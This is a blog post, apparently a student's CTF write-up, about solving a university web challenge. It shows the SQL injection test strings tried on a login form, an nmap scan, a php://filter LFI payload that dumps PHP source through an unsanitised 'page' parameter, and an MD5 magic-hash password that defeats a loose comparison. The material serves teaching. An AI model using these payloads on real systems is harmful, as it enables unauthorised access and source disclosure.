<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>LFI/RFI Wrapper - KCSC | Another infosec blog</title><!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/blog/en/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/blog/en/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/blog/en/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/blog/en/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/blog/en/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/blog/en/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/blog/en/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/blog/en/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/blog/en/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/blog/en/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/blog/en/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/blog/en/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/blog/en/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/blog/en/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/blog/en/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/blog/en/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/blog/en/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/blog/en/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/blog/en/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/blog/en/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/blog/en/assets/css/post.css"><link rel="stylesheet" href="/blog/en/assets/css/post.css"><link rel="preload" as="style" href="/blog/en/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/blog/en/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/blog/en/assets/js/post.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/blog/en/" alt="avatar"> <img src="/blog/en/assets/img/sample/avatar.gif" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/blog/en/">Another infosec blog</a></div><div class="site-subtitle font-italic">Where one's enthusiasm provides comprehension and knowledge for others.</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/blog/en/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/blog/en/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/blog/en/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/blog/en/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/blog/en/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/legiahuyy" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/0x7c00" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:window.open('mailto:' + ['legiahuy420','gmail.com'].join('@'))" > <i class="fas fa-envelope"></i> </a> <a href="/blog/en/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/blog/en/"> Posts </a> </span> <span>LFI/RFI Wrapper - KCSC</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Refactor the HTML structure. --> <!-- Suroundding the markdown table with '<div class="table-wrapper">. and '</div>' --> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>LFI/RFI Wrapper - KCSC</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Wed, Feb 24, 2021, 2:45 AM +0700" > Feb 24 <i class="unloaded">2021-02-24T02:45:00+07:00</i> </span> by <span class="author"> Huy </span></div></div><div class="post-content"><p>This is the first iteration of my CTF write-up series for the new year. Today we will be solving one of my university’s initial challenges. The task is simple itself but I want to show you the mindset of how I play the game.</p><h2 id="fingerprinting">Fingerprinting</h2><h3 id="manual-testing">Manual testing</h3><p>The absolute first thing I do when encountering any web challenge, is to actually visit the webpage and click on everything, fill out every text boxes. Just for a few minutes, get a feeling of mechanics and how the website might operate. Looking at various functionality is the key to do web-pentest.</p><p>The login page is shown as we follow our given URL, which is <code class="language-plaintext highlighter-rouge">http://p2n.000webhostapp.com/log_me_in/index.php?page=login</code></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://github.com/legiahuyy/image-host/blob/main/2021-2-24-RFI-Wrapper/1.png?raw=true" alt="1.png" style="zoom:150%;" /></p><p>Pretty much simple. Let’s try some universal input into those fields and see what the return is.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>username: admin
password: admin
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://github.com/legiahuyy/image-host/blob/main/2021-2-24-RFI-Wrapper/3.png?raw=true" style="zoom: 150%;" /></p><p>The result is expected, a single text line informing invalid credentials. Next we will put a quote (<code class="language-plaintext highlighter-rouge">'</code>) into one of the field to check whether or not adhere to malformed input.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>username: '
password: admin
</pre></table></code></div></div><p>But it still returns the same error line so we can assume that the form is somewhat safe from common bypassing technique.</p><p>It also worth mentioning that you should try different types of input such as:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>admin' --
admin' #
admin'/*
admin' or '1'='1
...
</pre></table></code></div></div><h3 id="automation-testing">Automation testing</h3><h4 id="host-information">Host information</h4><p>Next step is to enumerate the server type and ports. We all know in our current challenge that this step is insignificant but we can never know for sure, especially while dealing with real-life situations as this will help you determine which attack method to use, where and when to put the payload, etc.</p><p>So let us fire up our favorite tool of all time in automated enumeration, nmap.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nmap -v -A --os-guess p2n.000webhostapp.com
</pre></table></code></div></div><p>Basically, above command will provide us with how many ports are currently open and what type of OS the server is using.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre><td class="rouge-code"><pre>...

PORT      STATE    SERVICE
22/tcp    filtered ssh
80/tcp    open     http
443/tcp   open     https
873/tcp   filtered rsync
2020/tcp  filtered xinupageserver
2049/tcp  open     nfs
8080/tcp  open     http-proxy
9100/tcp  filtered jetdirect
9101/tcp  filtered jetdirect
32768/tcp open     filenet-tms

...
Device type: general purpose|storage-misc|WAP
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X|2.4.X (89%), HP embedded (87%), OpenBSD 4.X (86%), FreeBSD 12.X|11.X (86%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:openbsd:openbsd:4.3 cpe:/o:freebsd:freebsd:12.0 cpe:/o:freebsd:freebsd:11.1 cpe:/o:linux:linux_kernel:2.4
Aggressive OS guesses: Linux 3.10 - 4.11 (89%), Linux 4.10 (89%), Linux 4.4 (89%), Linux 3.13 or 4.2 (88%), HP P2000 G3 NAS device (87%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (86%), OpenBSD 4.3 (86%), FreeBSD 12.0-RELEASE (86%), Linux 3.18 (86%), Linux 3.16 (85%)
No exact OS matches for host (test conditions non-ideal).
</pre></table></code></div></div><p>Now we can see that the server is running on Linux-based OS. Using this we can keep going on enumerating those service ports but I will just put it here as we will discuss more about probing in our later posts.</p><h2 id="in-depth-analysis">In-depth analysis</h2><p>Now we want to pay a close attention to the given URL</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://p2n.000webhostapp.com/log_me_in/index.php?page=login
</pre></table></code></div></div><p>The variable <code class="language-plaintext highlighter-rouge">page</code> here looks pretty suspicious since its role is to act as a navigation controller. What to do here is to try assigning some value for <code class="language-plaintext highlighter-rouge">page</code>.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://p2n.000webhostapp.com/log_me_in/index.php?page=abc
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://github.com/legiahuyy/image-host/blob/main/2021-2-24-RFI-Wrapper/5.png?raw=true" alt="http://p2n.000webhostapp.com/log_me_in/index.php?page=abc" style="zoom:150%;" /></p><p>Of course, it would be like this. The web server takes the <code class="language-plaintext highlighter-rouge">abc</code> value and then adds the <code class="language-plaintext highlighter-rouge">.php</code> extension after it.</p><p>This is the result of <code class="language-plaintext highlighter-rouge">page=flag</code></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://github.com/legiahuyy/image-host/blob/main/2021-2-24-RFI-Wrapper/4.png?raw=true" alt="page=flag" style="zoom:150%;" /></p><p>After all, we are able to know that the endpoint has access to following objects:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>index.php
login.php
flag.php
</pre></table></code></div></div><p>And we come to the conclusion about this endpoint is simply a LFI/RFI gold-mine for us to abuse as the value of <code class="language-plaintext highlighter-rouge">page</code> is not being sanitized at all.</p><p>In case you are not aware of LFI/RFI, you can <a href="https://en.wikipedia.org/wiki/File_inclusion_vulnerability">read about it here</a>.</p><p>Since the webpage standard is not to include PHP objects as plain code, we have to wrap it up using any encoding types (base64). So our final payload would be as follow:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://p2n.000webhostapp.com/log_me_in/index.php?page=php://filter/convert.base64-encode/resource=index.php
</pre></table></code></div></div><p>Using Burp Suite to prettify the output:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://github.com/legiahuyy/image-host/blob/main/2021-2-24-RFI-Wrapper/6.png?raw=true" alt="image-20210224115215060" style="zoom: 200%;" /></p><p>Decode the base64 buffer will let us have the PHP source of <code class="language-plaintext highlighter-rouge">index.php</code></p><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="cp">&lt;?php</span>
<span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'page'</span><span class="p">]))</span> <span class="p">{</span>
	<span class="nv">$page</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'page'</span><span class="p">];</span>
	
	<span class="k">if</span> <span class="p">(</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag/i"</span><span class="p">,</span> <span class="nv">$page</span><span class="p">))</span>
		<span class="k">die</span><span class="p">(</span><span class="s2">"&lt;h1&gt;Not so ez =))). Let's think another way!!! &lt;/h1&gt;"</span><span class="p">);</span>

	<span class="k">include</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'page'</span><span class="p">]</span><span class="mf">.</span><span class="s1">'.php'</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
	<span class="nb">header</span><span class="p">(</span><span class="s1">'Location: ?page=login'</span><span class="p">);</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>
</pre></table></code></div></div><p>Do the same with <code class="language-plaintext highlighter-rouge">login.php</code> and grab the source</p><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
</pre><td class="rouge-code"><pre><span class="cp">&lt;?php</span>
<span class="k">include</span><span class="p">(</span><span class="s2">"flag.php"</span><span class="p">);</span>

<span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'usr'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="k">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'pwd'</span><span class="p">])</span> <span class="p">)</span> <span class="p">{</span>
	<span class="nv">$your_username</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'usr'</span><span class="p">];</span>
	<span class="nv">$your_password</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'pwd'</span><span class="p">];</span>

	<span class="k">if</span> <span class="p">(</span><span class="nv">$your_username</span> <span class="o">===</span> <span class="s2">"admin"</span> <span class="o">&amp;&amp;</span> <span class="nb">md5</span><span class="p">(</span><span class="nv">$your_password</span><span class="p">)</span> <span class="o">==</span> <span class="nb">md5</span><span class="p">(</span><span class="s2">"NOOPCJF"</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nv">$your_password</span> <span class="o">!==</span> <span class="s2">"NOOPCJF"</span> <span class="p">)</span>
		<span class="k">echo</span> <span class="s2">"Hello admin!! Here your flag: "</span><span class="mf">.</span><span class="nv">$flag</span><span class="p">;</span>
	<span class="k">else</span>
		<span class="k">die</span><span class="p">(</span><span class="s2">"Something went wrong!!!"</span><span class="p">);</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>


<span class="cp">&lt;!DOCTYPE html&gt;</span>
<span class="nt">&lt;html</span> <span class="na">lang=</span><span class="s">"en"</span><span class="nt">&gt;</span>
<span class="nt">&lt;head&gt;</span>
	<span class="nt">&lt;meta</span> <span class="na">charset=</span><span class="s">"UTF-8"</span><span class="nt">&gt;</span>
	<span class="nt">&lt;meta</span> <span class="na">name=</span><span class="s">"viewport"</span> <span class="na">content=</span><span class="s">"width=device-width, initial-scale=1.0"</span><span class="nt">&gt;</span>
	<span class="nt">&lt;title&gt;</span>Login page<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;/head&gt;</span>
<span class="nt">&lt;body&gt;</span>
	<span class="nt">&lt;h1&gt;</span>Login form<span class="nt">&lt;/h1&gt;</span>
	<span class="nt">&lt;form</span> <span class="na">action=</span><span class="s">"?page=login"</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span>
		<span class="nt">&lt;label</span> <span class="na">for=</span><span class="s">"usr"</span><span class="nt">&gt;</span> Username <span class="nt">&lt;/label&gt;</span>
		<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"usr"</span> <span class="na">required</span> <span class="nt">/&gt;</span> <span class="nt">&lt;br&gt;</span>

		<span class="nt">&lt;label</span> <span class="na">for=</span><span class="s">"pwd"</span><span class="nt">&gt;</span> Password <span class="nt">&lt;/label&gt;</span>
		<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"pwd"</span> <span class="na">required</span> <span class="nt">/&gt;</span> <span class="nt">&lt;br&gt;</span>

		<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"submit"</span><span class="nt">&gt;</span>
	<span class="nt">&lt;/form&gt;</span>
<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>

</pre></table></code></div></div><p>Now we want to look at the IF statement as it provides us the valid credentials to achieve our flag</p><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>	<span class="k">if</span> <span class="p">(</span><span class="nv">$your_username</span> <span class="o">===</span> <span class="s2">"admin"</span> <span class="o">&amp;&amp;</span> <span class="nb">md5</span><span class="p">(</span><span class="nv">$your_password</span><span class="p">)</span> <span class="o">==</span> <span class="nb">md5</span><span class="p">(</span><span class="s2">"NOOPCJF"</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nv">$your_password</span> <span class="o">!==</span> <span class="s2">"NOOPCJF"</span> <span class="p">)</span>
		<span class="k">echo</span> <span class="s2">"Hello admin!! Here your flag: "</span><span class="mf">.</span><span class="nv">$flag</span><span class="p">;</span>
	<span class="k">else</span>
		<span class="k">die</span><span class="p">(</span><span class="s2">"Something went wrong!!!"</span><span class="p">);</span>
</pre></table></code></div></div><p>The username is clearly <code class="language-plaintext highlighter-rouge">admin</code> but the password part is a little tricky as it might seems the correct one is <code class="language-plaintext highlighter-rouge">NOOPCJF</code> but the following statement is telling otherwise.</p><p>But there is a significant vulnerability here as the comparison between two hashes is using loose <code class="language-plaintext highlighter-rouge">==</code> operator.</p><p>The MD5 hash of <code class="language-plaintext highlighter-rouge">NOOPCJF</code> is <code class="language-plaintext highlighter-rouge">0e818888003657176127862245791911</code>. This is not actually a valid MD5 since it starts with <code class="language-plaintext highlighter-rouge">\x0e</code> and with the loose comparison operator, it will result in 0. So all you have to do is to find a MD5 string that also starts with <code class="language-plaintext highlighter-rouge">\x0e</code>. In this case, we will use <code class="language-plaintext highlighter-rouge">240610708</code> (<code class="language-plaintext highlighter-rouge">0e462097431906509019562988736854</code>) as our password.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>Username: admin
Password: 240610708
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://github.com/legiahuyy/image-host/blob/main/2021-2-24-RFI-Wrapper/7.png?raw=true" alt="image-20210224121527042" style="zoom:200%;" /></p><p>And the flag is <code class="language-plaintext highlighter-rouge">KCSC{gu7_ch0p_3m_hjhjhjhj!!!}</code></p><h2 id="conclusion">Conclusion</h2><p>So that is it for today write-up, thank you and I hope you can learn something from this. Feel free to share it to your friends.</p></div><div class="post-tail-wrapper text-muted"><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/blog/en/tags/kma/" class="post-tag no-text-decoration" >kma</a> <a href="/blog/en/tags/web-pentest/" class="post-tag no-text-decoration" >web-pentest</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=LFI/RFI Wrapper - KCSC - Another infosec blog&url=https://legiahuyy.github.io/blog/en/blog/en/posts/RFI-Wrapper/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=LFI/RFI Wrapper - KCSC - Another infosec blog&u=https://legiahuyy.github.io/blog/en/blog/en/posts/RFI-Wrapper/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=LFI/RFI Wrapper - KCSC - Another infosec blog&url=https://legiahuyy.github.io/blog/en/blog/en/posts/RFI-Wrapper/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/blog/en/tags/pwn/">pwn</a> <a class="post-tag" href="/blog/en/tags/kma/">kma</a> <a class="post-tag" href="/blog/en/tags/web-pentest/">web pentest</a> <a class="post-tag" href="/blog/en/tags/thoughts/">thoughts</a> <a class="post-tag" href="/blog/en/tags/reverse-engineer/">reverse engineer</a> <a class="post-tag" href="/blog/en/tags/network/">network</a> <a class="post-tag" href="/blog/en/tags/hackthebox/">hackthebox</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/blog/en/posts/ez-bof/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Feb 24 <i class="unloaded">2021-02-24T02:45:00+07:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>A simple BOF - KCSC</h3><div class="text-muted small"><p> Today we are going to test out Ghidra with one of my university pwnie challenge. Info Value Name pwn1 SHA256 d3e77076e7c9c113...</p></div></div></a></div><div class="card"> <a href="/blog/en/posts/HTB-Sharp/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> 